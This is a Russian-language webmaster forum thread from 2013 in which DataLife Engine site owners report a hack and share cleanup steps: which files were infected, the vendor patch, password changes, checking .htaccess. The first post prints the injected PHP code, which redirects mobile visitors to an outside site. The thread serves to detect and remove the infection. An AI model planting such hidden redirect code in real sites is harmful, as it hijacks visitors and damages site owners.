Взлом dle проверяем файлы.

Сообщений: 419 Регистрация: Июл 2012

14 Января 2013 00:09

Недавно ковырялся в бекапе сайта, случайно как-то увидел изменения config.php, и обнаружил там такой вот кодик:

Код

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
    header('Location: http://statuses.ws/');
}

Сейчас буду чистить весь сайт, проверять на вирусню: пока что такую фигня обраружил в /engine/data/config.php, /engine/init.php, index.php .Короче смотрите те файлы которые недавно были изменены, у меня вирус появился как смотрю по дате 9 января.

Или переустановить двиг?! smile:confused:

Роман

Сообщений: 1670 Регистрация: Июн 2011

14 Января 2013 05:26

Цитата
Леон пишет: Или переустановить двиг?!

Меняйте, потом отпишитесь, получилось или нет;)
А на крайний случай - нужно иметь свежие бэкапы).

Качественный рерайт/копирайт/перевод | Создание сайтов за еду! Дёшево!

Леон

Сообщений: 419 Регистрация: Июл 2012

14 Января 2013 12:29

Пока просто почистил, посмотрим что будет дальше. Двиг пока не охота переустанавливать слишком много модулей установлено.
Такая фигня не тока у меня:http://forum.searchengines.ru/showthread.php?s=cbc38d89875a6622c732af2d15892948&p=11292076

seed

Сообщений: 118 Регистрация: Авг 2012

14 Января 2013 13:42

вот блин тоже нашел эту дрянь на 3 сайтах, кто знает откуда корни растут?

Алексей // leshqa.

Сообщений: 30 Регистрация: Авг 2011

14 Января 2013 14:17

У меня тоже (( smile:mad:

Артем

Сообщений: 13 Регистрация: Окт 2010

14 Января 2013 15:45

Я пофиксил! сначало снес весь код левый и с офы пач поставил!

Артем

Сообщений: 13 Регистрация: Окт 2010

14 Января 2013 15:46

init.php
index.php
dbconfig.php
config.php

В этих файлах сносите левый код!
Сейчас найду ссылочку фикса и скину!

Артем

Сообщений: 13 Регистрация: Окт 2010

14 Января 2013 15:47

dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html]Вот скачайте перезалейте файл!

Вроде проверили этот файл... дописали много чего!

Артем

Сообщений: 13 Регистрация: Окт 2010

14 Января 2013 15:50

Дополнительно поменяйте все пароли от баз данных и тд! проверьте даты изменения файлов примерно тогда когда у вас изменились эти файлы и также сносите код! smile:p

Удачи вам! если поможет отпишитесь!

Negative Destruction

Сообщений: 103 Регистрация: Окт 2011

#10

15 Января 2013 00:28

Думая что большинство из зараженных двигов - nulled, отсюда и проблема, но могу ошибаться... Рекомендую еще заглянуть в корневой .htaccess, там тоже бывает много чего интересного!

anna911

Сообщений: 1159 Регистрация: Фев 2011

#11

15 Января 2013 01:22

Такая же фигня.... smile:mad:

руки оторвать...

Текстовый анализатор - Rush Analytics

anna911

Сообщений: 1159 Регистрация: Фев 2011

#12

15 Января 2013 01:48

Может кому будет полезно! Заметила что среди сайтов на DLE на одном же сервере есть зараженные и нет. Нашла чем они у меня отличаются (версии Dle разные) не заражены были сайты где файл admin.php, были переименованы.

_Cepera_

Сообщений: 152 Регистрация: Мар 2010

#13

15 Января 2013 01:48

index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

цтуе wnet

Сообщений: 45 Регистрация: Ноя 2011

#14

15 Января 2013 08:10

Кучка жалких школьников плакает, вай какая беда:)

Изменено: цтуе wnet - 15 Января 2013 08:12

_Cepera_

Сообщений: 152 Регистрация: Мар 2010

#15

15 Января 2013 10:00

Цитата
цтуе wnet пишет: Кучка жалких школьников плакает, вай какая беда:)

*смотрит как на идиота* smile:confused:

15.10.2017 21:34	Защита DLE и Joomla от взлома?
10.08.2016 21:14	Попытки взлома
09.01.2016 09:40	Взломан сайт???
21.08.2014 23:52	Взломали Dle, кто встречался с таким?
06.12.2013 03:00	Следы взлома сайта

Новые темы	Объявления	Свободное общение
19:33 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 17:02 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 15:12 Несколько статей хорошо выдаются в Гугле, но отвратительно в Яндексе 13:40 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 11:41 2Index - быстрая индексация страниц сайта и обратных ссылок 09:56 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 23:00 Продвижение по ключам	12:18 Мобильные и Резидентные Прокси Для Соц Сетей \| 3 Гб Бесплатно 07:51 Full-Stack Developer — Сайты и Софт любой сложности \| Developer Websites and Soft of any Complexity! 04:02 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 18:00 TokenTrade — Ваш новый надежный обменник 12:59 Бустмаркет 12:57 garantcoin.io - быстрый и надёжный сервис обмена криптовалюты GarantCoin 12:51 №1 Рассылка / Инвайтинг [TELEGRAM] \| Приватный метод	20:43 Добро пожаловать в цифровой мир... 15:59 Про мясо 23:09 ПП от PMS remote.team - 200$ за команду 13:28 Компьютерная мышь 22:55 Ну что, кто куда деваете свои сайты? 22:34 Используете беспроводные наушники? 22:26 Какой фильм посмотреть сегодня вечером?